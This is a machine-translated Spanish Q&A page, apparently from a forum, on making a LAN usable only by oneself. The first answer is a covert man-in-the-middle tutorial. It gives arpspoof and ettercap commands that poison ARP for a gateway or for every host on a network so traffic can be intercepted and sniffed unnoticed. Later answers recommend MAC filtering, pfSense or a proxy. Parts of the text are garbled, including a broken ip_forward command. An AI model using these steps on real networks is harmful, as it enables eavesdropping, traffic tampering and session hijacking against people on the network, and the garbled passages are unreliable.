Cómo hackear mi red LAN en Linux (Ubuntu) para que solo yo pueda usar Internet a través de ella

Hay dos formas de realizar ARP Spoofing

La falsificación de ARP puede permitir que un atacante intercepte tramas de datos en una red, modifique el tráfico o detenga todo el tráfico. A menudo, el ataque se usa como una apertura para otros ataques, como la denegación de servicio, el hombre en el medio o los ataques de secuestro de sesión

Para comenzar es instalar el programa necesario en Ubuntu o cualquier otra distribución basada en Debian que en este caso es el paquete dsniff que contiene el programa arpspoof

1.) Dsniff

Instalación (ubuntu)

$ sudo apt-get install dsniff

Habilitar el reenvío de IP

Para asegurarse de que el tráfico se reenvía al destino real cuando llega a nuestra máquina, se debe ejecutar el siguiente comando. Esto asegurará que la conexión de la máquina de destino no esté desconectada, y nadie debería darse cuenta de lo que estamos haciendo.

$ sudo echo 1> / proc / sys / net / ipv4 / ip_forward

Ejecutar suplantación de ARP

El siguiente comando le dirá a la puerta de enlace “Soy 192.168.0.100”, y el siguiente comando le dice a 192.168.0.100 “Soy la puerta de enlace”

$ sudo arpspoof 192.168.0.100 -t 192.168.0.1
$ sudo arpspoof 192.168.0.1 -t 192.168.0.100

Con esto, todo el tráfico que se supone que va a la puerta de enlace desde la máquina, y viceversa, pasará primero por nuestra máquina, y solo luego se enviará al objetivo real. Con esto podemos ejecutar cualquier herramienta de análisis de paquetes, como tcpdump o wireshark.

2.) Ettercap

Sin embargo, existen programas para simplificar todo el proceso. Uno de los programas preferidos para esto es ettercap. Ettercap también puede realizar falsificaciones de arp, entre muchas otras características que tiene. En Ubuntu, el paquete se llama ettercap-gtk;

Instalación (Ubuntu)

$ sudo apt-get install ettercap-gtk

Ejecutar ARP spoofing (GUI)

Ejecutar el programa con el modificador -G lo ejecutará en GTK en lugar de en ncurses.

$ sudo ettercap -G

En el menú, elija lo siguiente;
Olfatear -> Olfatear desatado
Y en el indicador, elija la interfaz de red que se utilizará. Normalmente sería eth0
Interfaz de red: eth0
En el menú nuevamente, elija lo siguiente para agregar todos los hosts de la red a la lista
Hosts -> Buscar hosts
Y seguir lo siguiente hará la falsificación de arp para todos en la red
Mitm -> Intoxicación por Arp -> Ok
Inicio -> Comienza a oler

Ejecutar ARP spoofing (comando)

El siguiente comando hará lo mismo que el ejemplo anterior, en un solo comando;

sudo ettercap -q -T -M arp

¿Necesito un enrutador, un conmutador o un concentrador?

Cómo ver el uso de WiFi

¿Qué tan bien funcionan los flashes Nissin en las cámaras Nikon? ¿Funcionan bien para TTL inalámbrico?

¿Cuál es la cantidad de datos inalámbricos intercambiados con un vehículo eléctrico autónomo conectado?

¿Son estas estadísticas de señal Wifi lo suficientemente buenas?

¿Cuál es la mejor manera de hackear una red WiFi segura con WPA / WPA2 PSK, obtener su contraseña e iniciar sesión en la red?

Cuando dice red LAN, supongo que está hablando de su enrutador. En primer lugar, debe poder iniciar sesión en su enrutador. Para encontrar la IP, debe hacer ‘sudo ifconfig’ en el terminal de Linux y luego ver la IP de la puerta de enlace de su LAN. También anote su ‘ID de MAC’ (o HWAddr), que será un número hexadecimal de 48 bits en este formato (01-23-45-67-89-ab). En su mayoría, la dirección IP será 192.168.0.1 o 192.168.1.1 Tipo la dirección IP de la puerta de enlace en el navegador. Espero que todavía use la contraseña predeterminada, que es admin / admin o admin / contraseña para la mayoría de los enrutadores.

(De lo contrario, puede restablecer el enrutador (usando un pin y metiéndolo dentro del orificio de restablecimiento durante 15-30 segundos, y lo restablecerá a la contraseña predeterminada que es admin / admin o admin / contraseña)

Ahora vaya a la configuración del enrutador -> Filtrado de MAC.
Luego seleccione habilitar el filtrado MAC.
Seleccione la opción “Solo permitir a estos usuarios” o algo similar.
y escriba su dirección MAC de hardware (HWAddr) que obtuvo de ifconfig anteriormente mediante el botón AGREGAR. Restablecer el enrutador. ¡Aqui tienes! nadie aparte de usted puede usar su enrutador de internet. Recomiendo encarecidamente no usar esto si no es el propietario, ya que el propietario podría saber sobre usted a través de su ID de MAC.

Otra forma es deshabilitar DHCP en su enrutador y usar su terminal de Linux como servidor DHCP (Gateway). Puede bloquear / poner en una lista negra las direcciones IP para que no se conecten a su red editando dhcpd.conf. Pero para hacerlo, debe hacer que su terminal de Linux sea un servidor DHCP. Esta guía lo ayudará a hacer esto.
Guía rápida: Capítulo 08: Configuración del servidor DHCP

Suleiman Abdallah

Solo otra opción: configure un dispositivo pfSense como su enrutador (o justo detrás del enrutador de su ISP) y cree un portal de inicio de sesión a través de él para acceder a Internet. El firewall de código abierto más confiable del mundo (enlace pfSense allí)

Probablemente exagere … a menos que su red LAN esté en su lugar de trabajo y no quiera / necesite que sus empleados / clientes se conecten a su red para acceder a Internet. En ese caso, podría tener mucho sentido. Sería el único que conocería la contraseña para acceder a la WAN, pero aún podría tener una LAN en funcionamiento para acceder a archivos e impresoras compartidos, por ejemplo.

En ese escenario, puede configurar pfSense de forma gratuita en una antigua torre de escritorio y puede hacer muchas, muchas cosas como esta.

He hecho muchas suposiciones con esta respuesta; solo te doy algunas opciones más.

Marilyne Peguy.

Cuando eres PROPIETARIO de la LAN, ¿qué quieres decir con hackearla?

Si usted es quien lo administra, simplemente juegue con el DNS y la puerta de enlace y solo usted usará Internet. El resto de todos obtendrá 404 si finaliza todas las solicitudes web a alguna url que se refiere a NULL.

Suleiman Abdallah

Supongo que le gustaría preguntar cómo configura su red LAN para que solo usted pueda usar Internet a través de ella. No hay necesidad de piratería de ningún tipo. Puede configurar un:

filtrado de direcciones mac y permite que solo su dirección mac tenga acceso a Internet. Esto se realiza a través de la configuración del enrutador. La desventaja de esto es que cualquiera que pueda obtener su dirección MAC puede suplantarla para obtener acceso
Puede configurar un servicio de proxy de Internet que requiera contraseña para permitir el acceso a Internet.

El proxy de Internet puede ser un servidor o host independiente en su LAN que tenga la conexión a Internet como el único host en la red. Todos los demás hosts obtienen acceso a Internet mediante la representación de sus solicitudes a este host. Algunos enrutadores sofisticados también pueden proporcionar dicha funcionalidad.

Marilyne Peguy.

¿Yo solo? Suponiendo que usted es un Usuario Doméstico, puede aplicar el FILTRADO MAC … intente ver el manual de su enrutador, lo ayudará mucho, luego implemente la configuración en el enrutador … intente usar la solución de Vishal, lo ayudará. Aclamaciones

More Interesting

¿Es valioso JioFi para una configuración WiFi en casa?

¿Es WiFi gratis para todo el mundo una idea legítima? ¿Podría esto realmente lograrse?

¿Qué parte de una computadora determina si es capaz o no de WiFi?

¿Los operadores inalámbricos pagan wifi gratuito en los aeropuertos?

¿Por qué los wifi de bolsillo son tan populares en Japón?

¿Por qué los ascensores afectan las señales WiFi?

¿Cuál es el nombre de la aplicación de Android para guardar y transferir todo el wifi conectado a un teléfono Android a otro Android?

¿Cuáles son los aspectos negativos de los puntos de acceso móvil?

¿Cómo se pueden transferir archivos entre 2 PC de forma inalámbrica?

¿Por qué India prohíbe que los aviones en el espacio aéreo indio tengan Wi-Fi?

¿Cuáles son los requisitos recomendados para un ataque de fuerza bruta para descifrar contraseñas WiFi en menos de 12 horas?